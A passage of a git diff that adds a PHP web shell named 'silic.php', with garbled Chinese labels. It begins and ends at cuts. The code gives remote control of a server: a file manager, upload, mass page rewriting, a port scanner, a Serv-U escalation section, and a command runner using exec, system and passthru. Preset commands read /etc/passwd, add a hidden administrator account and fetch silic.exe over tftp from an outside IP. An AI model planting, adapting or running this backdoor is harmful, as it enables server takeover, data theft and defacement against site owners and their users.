          '.$fil.$file.' + + + + + + + + + + + + + + + + + + + +'.$end; +?> \ No newline at end of file diff --git a/php/silic.php b/php/silic.php new file mode 100644 index 0000000..1d5e4d0 --- /dev/null +++ b/php/silic.php @@ -0,0 +1,2210 @@ + +*{padding:0; margin:0;} +body{background:threedface;font-family:"Verdana","Tahoma","",sans-serif;font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;} +a{color:#000000;text-decoration:none;} +a:hover{background:#BBBBBB;} +table{color:#000000;font-family:"Verdana","Tahoma","",sans-serif;font-size:13px;border:1px solid #999999;} +td{background:#F9F6F4;} +.toptd{background:threedface;width:310px;border-color:#FFFFFF #999999 #999999 #FFFFFF;border-style:solid;border-width:1px;} +.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;} +.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;} +.footer{padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:22px;width:950px;color:#000000;background: #888888;} +\n +END; +return false; +} +//ļ +class packdir +{ + var $out=''; + var $datasec=array(); + var $ctrl_dir=array(); + var $eof_ctrl_dir="\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset=0; +function packdir($array) +{ + if(@function_exists('gzcompress')) + { + for($n = 0;$n < count($array);$n++) + { + $array[$n] = urldecode($array[$n]); + $fp = @fopen($array[$n], 'r'); + $filecode = @fread($fp, @filesize($array[$n])); + @fclose($fp); + $this -> filezip($filecode,basename($array[$n])); + } + @closedir($zhizhen); + $this->out = $this->packfile(); + return true; +} +return false; +} +function at($atunix = 0) +{ + $unixarr = ($atunix == 0) ? getdate() : getdate($atunix); + if ($unixarr['year'] < 1980) + { + $unixarr['year'] = 1980; + $unixarr['mon'] = 1; + $unixarr['mday'] = 1; + $unixarr['hours'] = 0; + $unixarr['minutes'] = 0; + $unixarr['seconds'] = 0; + } + return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1); +} +function filezip($data, $name, $time = 0) +{ + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->at($time)); + $hexdtime = '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $c_len = strlen($zdata); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $this -> datasec[] = $fr; + $new_offset = strlen(implode('', $this->datasec)); + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset = $new_offset; + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; +} +function packfile() +{ + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00"; +} +} +function File_Str($string) +{ + return str_replace('//','/',str_replace('\\','/',$string)); +} +function File_Size($size) +{ + if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G'; + elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M'; + elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K'; + else $size = $size . ' B'; + return $size; +} +function File_Mode() +{ + $RealPath = realpath('./'); + $SelfPath = $_SERVER['PHP_SELF']; + $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/')); + return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); +} +function File_Read($filename) +{ + $handle = @fopen($filename,"rb"); + $filecode = @fread($handle,@filesize($filename)); + @fclose($handle); + return $filecode; +} +function File_Write($filename,$filecode,$filemode) +{ + $key = true; + $handle = @fopen($filename,$filemode); + if(!@fwrite($handle,$filecode)) + { + @chmod($filename,0666); + $key = @fwrite($handle,$filecode) ? true : false; + } +@fclose($handle); +return $key; +} +function File_Up($filea,$fileb) +{ + $key = @copy($filea,$fileb) ? true : false; + if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false; + return $key; +} +function File_Down($filename) +{ + if(!file_exists($filename)) return false; + $filedown = basename($filename); + $array = explode('.', $filedown); + $arrayend = array_pop($array); + header('Content-type: application/x-'.$arrayend); + header('Content-Disposition: attachment; filename='.$filedown); + header('Content-Length: '.filesize($filename)); + @readfile($filename); + exit; +} +function File_Deltree($deldir) +{ + if(($mydir = @opendir($deldir)) == NULL) return false; + while(false !== ($file = @readdir($mydir))) + { + $name = File_Str($deldir.'/'.$file); + if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);} + if(is_file($name)){@chmod($name,0777);@unlink($name);} + } + @closedir($mydir); + @chmod($deldir,0777); + return @rmdir($deldir) ? true : false; +} +function File_Act($array,$actall,$inver) +{ + if(($count = count($array)) == 0) return 'ѡļ'; + if($actall == 'e') + { + $zip = new packdir; + if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;} + return 'ļʧ'; + } + $i = 0; + while($i < $count) + { + $array[$i] = urldecode($array[$i]); + switch($actall) + { + case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '·'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = 'Ƶ'.$inver.'Ŀ¼'; break; + case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'ɾ'; break; + case "c" : if(!eregi("^[0-7]{4}$",$inver)) return 'ֵ'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '޸Ϊ'.$inver; break; + case "d" : @touch($array[$i],strtotime($inver)); $msg = '޸ʱΪ'.$inver; break; + } + $i++; + } + return 'ѡļ'.$msg.''; +} +function File_Edit($filepath,$filename,$dim = '') +{ + $THIS_DIR = urlencode($filepath); + $THIS_FILE = File_Str($filepath.'/'.$filename); + if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));} + else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';} +print<< +var NS4 = (document.layers); +var IE4 = (document.all); +var win = this; +var n = 0; +function search(str){ + var txt, i, found; + if(str == "")return false; + if(NS4){ + if(!win.find(str)) while(win.find(str, false, true)) n++; else n++; + if(n == 0) alert(str + " ... Not-Find") + } + if(IE4){ + txt = win.document.body.createTextRange(); + for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){ + txt.moveStart("character", 1); + txt.moveEnd("textedit") + } + if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++} + else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")} + } + return false +} +function CheckDate(){ + var re = document.getElementById('mtime').value; + var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; + var r = re.match(reg); + if(r==null){alert('ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss');return false;} + else{document.getElementById('editor').submit();} +} + +
          : +
          +
          +
          +
          +
          ļ޸ʱ
          +
          +
          + +END; +} +function File_Soup($p) +{ + $THIS_DIR = urlencode($p); + $UP_SIZE = get_cfg_var('upload_max_filesize'); + $MSG_BOX = 'С:'.$UP_SIZE.', ʽ(new.php),Ϊ,򱣳ԭļ.'; + if(!empty($_POST['updir'])) + { + if(count($_FILES['soup']) >= 1) + { + $i = 0; + foreach ($_FILES['soup']['error'] as $key => $error) + { + if ($error == UPLOAD_ERR_OK) + { + $souptmp = $_FILES['soup']['tmp_name'][$key]; + if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key]; + $MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'ϴɹ' : $soupname.'ϴʧ'; + } + $i++; + } + } + else + { + $MSG_BOX = 'ѡļ'; + } + } +print<<{$MSG_BOX} +
          +
          ϴĿ¼:
          +
          1 $MSG[0]
          +
          2 $MSG[1]
          +
          3 $MSG[2]
          +
          4 $MSG[3]
          +
          5 $MSG[4]
          +
          6 $MSG[5]
          +
          7 $MSG[6]
          +
          8 $MSG[7]
          +
          + +END; +} +function File_a($p) +{ + if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; + $MSG_BOX = 'ȴϢ'; + $UP_DIR = urlencode(File_Str($p.'/..')); + $REAL_DIR = File_Str(realpath($p)); + $FILE_DIR = File_Str(dirname(__FILE__)); + $ROOT_DIR = File_Mode(); + $THIS_DIR = urlencode(File_Str($REAL_DIR)); + $NUM_D = 0; + $NUM_F = 0; + if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '༭ļ '.$_POST['pfn'].' ɹ' : '༭ļ '.$_POST['pfn'].' ʧ';@touch($_POST['pfn'],$intime);} + if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? 'ϴļ '.$upfilename.' ɹ' : 'ϴļ '.$upfilename.' ʧ';} + if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);} + if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = 'ֵ'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '޸ '.$modfile.' Ϊ '.$_GET['md'].' ɹ' : '޸ '.$modfile.' Ϊ '.$_GET['md'].' ʧ';} + if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? ' '.$_GET['mn'].' Ϊ '.$_GET['rn'].' ɹ' : ' '.$_GET['mn'].' Ϊ '.$_GET['rn'].' ʧ';} + if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? 'Ŀ¼ '.$_GET['dn'].' ɹ' : 'Ŀ¼ '.$_GET['dn'].' ʧ';} + if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? 'ɾĿ¼ '.$_GET['dd'].' ɹ' : 'ɾĿ¼ '.$_GET['dd'].' ʧ';} + if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = 'ļ';} + Root_CSS(); +print<< + function Inputok(msg,gourl) + { + smsg = "ǰļ:[" + msg + "]"; + re = prompt(smsg,unescape(msg)); + if(re) + { + var url = gourl + escape(re); + window.location = url; + } + } + function Delok(msg,gourl) + { + smsg = "ȷҪɾ[" + unescape(msg) + "]?"; + if(confirm(smsg)) + { + if(gourl == 'b') + { + document.getElementById('actall').value = escape(gourl); + document.getElementById('fileall').submit(); + } + else window.location = gourl; + } + } + function CheckDate(msg,gourl) + { + smsg = "ǰļʱ:[" + msg + "]"; + re = prompt(smsg,msg); + if(re) + { + var url = gourl + re; + var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; + var r = re.match(reg); + if(r==null){alert('ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss');return false;} + else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();} + } + } + function CheckAll(form) + { + for(var i=0;i +
          {$MSG_BOX}
          +
          +
          + + +
          +
          + + + + + + +
          +
          +
          +
          '.$formg.'ִ :
          +
          '.$formg.'Change Dir :
          +
          +
          '.$formg.'Create Dir :
          +
          '.$formg.'Create File :
          +
          '.$formg.'Upload :
          '.$nowaddress.' + +
          +
          '.$formg.'Copy File :
          To
          + +END; + if(($h_d = @opendir($p)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' or $Filename == '..') continue; + $Filepath = File_Str($REAL_DIR.'/'.$Filename); + if(is_dir($Filepath)) + { + $Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4); + $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); + $Filepath = urlencode($Filepath); + echo "\r\n".' '; + $Filename = urlencode($Filename); + echo ' '; + echo ' '; + echo ' '; + echo ' '."\r\n"; + $NUM_D++; + } + } + @rewinddir($h_d); + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' or $Filename == '..') continue; + $Filepath = File_Str($REAL_DIR.'/'.$Filename); + if(!is_dir($Filepath)) + { + $Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath); + $Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4); + $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); + $Filesize = File_Size(@filesize($Filepath)); + if($Filepath == File_Str(__FILE__)) $fname = ''.$Filename.''; else $fname = $Filename; + echo "\r\n".' '; + $Filepath = urlencode($Filepath); + $Filename = urlencode($Filename); + echo ' '; + echo ' '; + echo ' '; + echo ' '."\r\n"; + $NUM_F++; + } + } + @closedir($h_d); + if(!$Filetime) $Filetime = '2009-01-01 00:00:00'; +print<< +
          + + + + + + + +Ŀ¼({$NUM_D}) / ļ({$NUM_F})
          +END; +return true; +} +//滻 +function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb) +{ + if(($h_d = @opendir($tp)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' || $Filename == '..') continue; + $Filepath = File_Str($tp.'/'.$Filename); + if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb); + $doing = false; + if(eregi($tt,$Filename)) + { + $ic = File_Read($Filepath); + if($th) + { + if(!stristr($ic,$tca)) continue; + $ic = str_replace($tca,$tcb,$ic); + $doing = true; + } + else + { + preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc); + for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}} + } + if($td) $ftime = @filemtime($Filepath); + if($doing) echo File_Write($Filepath,$ic,'wb') ? 'ɹ:'.$Filepath.'
          '."\r\n" : 'ʧ:'.$Filepath.'
          '."\r\n"; + if($td) @touch($Filepath,$ftime); + ob_flush(); + flush(); + } + } + @closedir($h_d); + return true; +} +function Tihuan_d() +{ + if((!empty($_POST['tp'])) && (!empty($_POST['tt']))) + { + echo '
          '; + $tt = str_replace('.','\\.',$_POST['tt']); + $td = isset($_POST['td']) ? true : false; + $tb = ($_POST['tb'] == 'a') ? true : false; + $th = ($_POST['th'] == 'a') ? true : false; + if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']); + echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '' : '쳣ֹ'; + echo '
          '; + return false; + } + $FILE_DIR = File_Str(dirname(__FILE__)); + $ROOT_DIR = File_Mode(); +print<< +function Fulllll(i){ + if(i==0) return false; + Str = new Array(5); + if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];} + else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];} + return true; +} +function showth(th){ + if(th == 'a') document.getElementById('setauto').innerHTML = ':
          滻Ϊ:'; + if(th == 'b') document.getElementById('setauto').innerHTML = '
          غ׺

          滻Ϊ '; + return true; +} +function autoup(){ + if(document.getElementById('tp').value == ''){alert('·Ϊ');return false;} + if(document.getElementById('tt').value == ''){alert('ͲΪ');return false;} + if(document.getElementById('tca').value == ''){alert('벻Ϊ');return false;} + document.getElementById('tform').submit(); +} + +
          +
          滻· +
          +
          ļ +
          +
          滻ļеָ 滻ļеصַ
          +

          滻Ϊ
          +
          ļ޸ʱ䲻
          +
          滻Ӧڸļ,ļкļ +
          滻Ӧڸļ
          +
          + +END; +return true; +} +//ɨľ +function Antivirus_Auto($sp,$features,$st,$sb) +{ + if(($h_d = @opendir($sp)) == NULL) return false; + $ROOT_DIR = File_Mode(); + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' || $Filename == '..') continue; + $Filepath = File_Str($sp.'/'.$Filename); + if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st); + if(eregi($st,$Filename)) + { + if($Filepath == File_Str(__FILE__)) continue; + $ic = File_Read($Filepath); + foreach($features as $var => $key) + { + if(stristr($ic,$key)) + { + $Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath); + $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); + echo ' '.$Filepath.'
          ɾ '; + echo ' '.$Filetime.' '.$var.'

          '."\r\n"; + break; + } + } + ob_flush(); + flush(); + } + } + @closedir($h_d); + return true; +} + +function Antivirus_e() +{ + if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo 'ɾɹ';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? 'ɾɹ' : 'ɾʧ';} return false;} + if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; } + $SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode(); + $features_php = array('evalһ仰'=>'eval(','read'=>'->read()','readdir3'=>'readdir(','MYSQLԶ庯'=>'returns string soname','1'=>'eval(gzinflate(','2'=>'eval(base64_decode(','3'=>'base64_decode(','evalһ仰2'=>'eval (','php'=>'copy($_FILES','2'=>'copy ($_FILES','ϴ'=>'move_uploaded_file($_FILES','ϴ2'=>'move_uploaded_file ($_FILES','С'=>'str_replace(\'\\\\\',\'/\','); + $features_asx = array('ű'=>'VBScript.Encode',''=>'#@~^','fso'=>'fso.createtextfile(path,true)','excuteһ仰'=>'execute','evalһ仰'=>'eval','wscript'=>'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B','ݿ'=>'13709620-C279-11CE-A49E-444553540000','wscript'=>'WScript.Shell','fso'=>'0D43FE01-F093-11CF-8940-00A0C9054228','ʮ'=>'','aspx'=>'Process.GetProcesses','aspxһ仰'=>'Request.BinaryRead'); +print<< +
          ɨ·
          +
          ľ phpľ +asp+aspxľ
          +
          ɨӦڸļ,ļкļ +
          ɨӦڸļ
          +
          + +END; +if(!empty($_POST['sp'])) +{ + echo '
          '; + if(isset($_POST['stphp'])){$features_all = $features_php; $st = '\.php|\.inc|\;';} + if(isset($_POST['stasx'])){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';} + if(isset($_POST['stphp']) && isset($_POST['stasx'])){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';} + $sb = ($_POST['sb'] == 'a') ? true : false; + echo Antivirus_Auto($_POST['sp'],$features_all,$st,$sb) ? 'ɨ' : '쳣ֹ'; + echo '
          '; +} +return true; +} +//ļ +function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb) +{ + //echo $sfp.'
          '.$sfc.'
          '.$sft.'
          '.$sff.'
          '.$sfb; + if(($h_d = @opendir($sfp)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' || $Filename == '..') continue; + if(eregi($sft,$Filename)) continue; + $Filepath = File_Str($sfp.'/'.$Filename); + if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb); + if($sff) + { + if(stristr($Filename,$sfc)) + { + echo ' '.$Filepath.'
          '."\r\n"; + ob_flush(); + flush(); + } + } + else + { + $File_code = File_Read($Filepath); + if(stristr($File_code,$sfc)) + { + echo ' '.$Filepath.'
          '."\r\n"; + ob_flush(); + flush(); + } + } + } + @closedir($h_d); + return true; +} +function Findfile_j() +{ + if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo 'ɾɹ';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? 'ɾɹ' : 'ɾʧ';} return false;} + if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; } + $SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode(); + $SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config'; + $SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip|.pdf|.dll|.exe|.txt|.inf|.ppt|.xls|.js'; +print<< +
          ɨ·
          +
          ļ
          +
          ؼִ +ļ +
          +
          Ӧڸļ,ļкļ +
          Ӧڸļ
          +
          + +END; + if((!empty($_POST['sfp'])) && (!empty($_POST['sfc']))) + { + echo '
          '; + $_POST['sft'] = str_replace('.','\\.',$_POST['sft']); + $sff = ($_POST['sff'] == 'a') ? true : false; + $sfb = ($_POST['sfb'] == 'a') ? true : false; + echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '' : '쳣ֹ'; + echo '
          '; + } + return true; +} +//ϵͳϢ +function Info_Cfg($varname){ +switch($result = get_cfg_var($varname)){ + case 0:return "No";break; + case 1:return "Yes";break; + default:return $result;break;}} +function Info_Fun($funName){return(false !==function_exists($funName)) ? "Yes" : "No";} +function Info_f() +{ +$dis_func = get_cfg_var("disable_functions"); +$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "ϴ"; +$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; +if($dis_func == ""){$dis_func = "No";} +else{ + $dis_func = str_replace(" ","
          ",$dis_func); + $dis_func = str_replace(",","
          ",$dis_func); +} +$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; +$info = array( +array("ʱ/ʱ",date("Ymd h:i:s",time())." / ".gmdate("Ynj H:i:s",time()+8*3600)), +array(":˿(ip)","".$_SERVER['SERVER_NAME'].":".$_SERVER['SERVER_PORT']." ( ".gethostbyname($_SERVER['SERVER_NAME'])." )"), +array("ϵͳ(ֱ)",PHP_OS." (".$_SERVER['HTTP_ACCEPT_LANGUAGE'].")"), +array("",$_SERVER['SERVER_SOFTWARE']), +array("IP",getenv('REMOTE_ADDR')), +array("PHPзʽ(汾)",strtoupper(php_sapi_name())."(".PHP_VERSION.") / ȫģʽ:".Info_Cfg("safemode")), +array("Ա",$adminmail), +array("ļ·",__FILE__), +array("ʹURLļ[allow_url_fopen]",Info_Cfg("allow_url_fopen")), +array("̬ӿ[enable_dl]",Info_Cfg("enable_dl")), +array("ʾϢ[display_errors]",Info_Cfg("display_errors")), +array("Զȫֱ[register_globals]",Info_Cfg("register_globals")), +array("Զַת[magic_quotes_gpc]",Info_Cfg("magic_quotes_gpc")), +array("ڴʹ[memory_limit]",Info_Cfg("memory_limit")), +array("POSTֽ[post_max_size]",Info_Cfg("post_max_size")), +array("ϴ[upload_max_filesize]",$upsize), +array("ʱ[max_execution_time]",Info_Cfg("max_execution_time").""), +array("ú[disable_functions]",$dis_func), +array("Ϣ[phpinfo()]",$phpinfo), +array("Ŀǰпռdiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), +array("GZѹļ֧[zlib]",Info_Fun("gzclose")), +array("ZIPѹļ֧[ZipArchive(php_zip)]",Info_Fun("zip_open")), +array("IMAPʼϵͳ",Info_Fun("imap_close")), +array("XML",Info_Fun("xml_set_object")), +array("FTP½",Info_Fun("ftp_login")), +array("Session֧",Info_Fun("session_start")), +array("Socket֧",Info_Fun("fsockopen")), +array("MySQLݿ",Info_Fun("mysql_close")), +array("MSSQLݿ",Info_Fun("mssql_close")), +array("Postgre SQLݿ",Info_Fun("pg_close")), +array("SQLiteݿ",Info_Fun("sqlite_close")), +array("Oracleݿ",Info_Fun("ora_close")), +array("Oracle 8ݿ",Info_Fun("OCILogOff")), +array("SyBaseݿ",Info_Fun("sybase_close")), +array("Hyperwaveݿ",Info_Fun("hw_close")), +array("InforMixݿ",Info_Fun("ifx_close")), +array("FileProݿ",Info_Fun("filepro_fieldcount")), +array("DBA/DBM",Info_Fun("dba_close")." / ".Info_Fun("dbmclose")), +array("ODBC/dBASE",Info_Fun("odbc_close")." / ".Info_Fun("dbase_close")), +array("PREL﷨[PCRE]",Info_Fun("preg_match")), +array("PDF֧",Info_Fun("pdf_close")), +array("ͼδ[GD Library]",Info_Fun("imageline")), +array("SNMPЭ",Info_Fun("snmpget")),); +echo '
          ϼĿ¼ ޸ʱ С
          0 '.$Filename.' ɾ '; + echo ' '.$Fileperm.' '.$Filetime.'
          '.$fname.' '; + echo ' '.$Fileperm.''.$Filetime.' '.$Filesize.'
          '; +for($i = 0;$i < count($info);$i++){echo ''."\n";} +echo '
          '.$info[$i][0].''.$info[$i][1].'
          '; +return true; +} +//ִ +function Exec_Run($cmd) +{ + $res = ''; + if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);} + elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);} + elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();} + elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();} + elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);} + return $res; +} +function Exec_g() +{ + $res = ''; + $cmd = 'dir'; + if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];} +print<< +function sFull(i){ + Str = new Array(14); + Str[0] = "dir"; + Str[1] = "ls /etc"; + Str[2] = "cat /etc/passwd"; + Str[3] = "cp -a /home/www/html/a.php /home/www2/"; + Str[4] = "uname -a"; + Str[5] = "gcc -o /tmp/silic /tmp/silic.c"; + Str[6] = "net user silic silic /add & net localgroup administrators silic /add"; + Str[7] = "net user"; + Str[8] = "netstat -an"; + Str[9] = "ipconfig"; + Str[10] = "copy c:\\1.php d:\\2.php"; + Str[11] = "tftp -i 123.234.222.1 get silic.exe c:\\silic.exe"; + Str[12] = "lsb_release -a"; + Str[13] = "chmod 777 /tmp/silic.c"; +document.getElementById('cmd').value = Str[i]; +return true; +} + +
          + + +
          +
          +END; +return true; +} +//ɨ˿ +function Port_i() +{ +$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1'; +$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|22|23|25|80|110|111|135|139|443|445|1433|1521|3306|3389|4899|5432|5631|7001|8000|8080|14147|43958'; +print<< +
          ɨIP
          +
          ˿ں
          +
          + +END; + if((!empty($_POST['ip'])) && (!empty($_POST['port']))) + { + echo '
          '; + $ports = explode('|', $_POST['port']); + for($i = 0;$i < count($ports);$i++) + { + $fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,2); + echo $fp ? 'Ŷ˿ ---> '.$ports[$i].'
          ' : 'رն˿ ---> '.$ports[$i].'
          '; + ob_flush(); + flush(); + } + echo '
          '; + } + return true; +} +//ServU +function Servu_l() +{ +$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; +print<<[ִ] [û] +
          +
          ServU˿
          +
          ServUû
          +
          ServU
          +END; +if($_GET['o'] == 'adduser') +{ +print<<ʺ + +Ŀ¼ +END; +} +else +{ +print<<Ȩ
          + + + +END; +} +echo '
          '; + if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) + { + echo '
